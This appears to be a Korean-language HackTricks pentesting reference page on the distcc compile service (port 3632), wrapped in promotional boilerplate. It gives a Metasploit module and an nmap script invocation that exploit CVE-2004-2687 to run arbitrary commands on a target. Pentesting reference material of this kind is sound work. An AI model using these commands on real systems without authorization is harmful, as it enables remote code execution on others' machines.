tip
AWS 해킹 배우기 및 연습하기:HackTricks Training AWS Red Team Expert (ARTE)
GCP 해킹 배우기 및 연습하기: HackTricks Training GCP Red Team Expert (GRTE)
HackTricks 지원하기
- 구독 계획 확인하기!
- **💬 디스코드 그룹 또는 텔레그램 그룹에 참여하거나 트위터 🐦 @hacktricks_live를 팔로우하세요.
- HackTricks 및 HackTricks Cloud 깃허브 리포지토리에 PR을 제출하여 해킹 트릭을 공유하세요.
기본 정보
Distcc는 네트워크의 다른 컴퓨터의 유휴 처리 능력을 활용하여 컴파일 프로세스를 향상시키는 도구입니다. distcc가 머신에 설정되면, 이 머신은 다른 시스템에 컴파일 작업을 분배할 수 있습니다. 이 수신 시스템은 distccd 데몬이 실행 중이어야 하며, 전송된 코드를 처리할 수 있는 호환 가능한 컴파일러가 설치되어 있어야 합니다.
기본 포트: 3632
PORT STATE SERVICE
3632/tcp open distccd
Exploitation
CVE-2004-2687에 취약한지 확인하여 임의 코드를 실행합니다:
bash
msf5 > use exploit/unix/misc/distcc_exec
nmap -p 3632 <ip> --script distcc-cve2004-2687 --script-args="distcc-exec.cmd='id'"
Shodan
이 서비스는 shodan이 탐지하지 않는 것 같습니다.
Resources
- https://www.rapid7.com/db/modules/exploit/unix/misc/distcc_exec
- https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855
Post created by Álex B (@r1p)
tip
AWS 해킹 배우기 및 연습하기:HackTricks Training AWS Red Team Expert (ARTE)
GCP 해킹 배우기 및 연습하기: HackTricks Training GCP Red Team Expert (GRTE)
HackTricks 지원하기
- 구독 계획 확인하기!
- **💬 디스코드 그룹 또는 텔레그램 그룹에 참여하거나 트위터 🐦 @hacktricks_live를 팔로우하세요.
- HackTricks 및 HackTricks Cloud 깃허브 리포지토리에 PR을 제출하여 해킹 트릭을 공유하세요.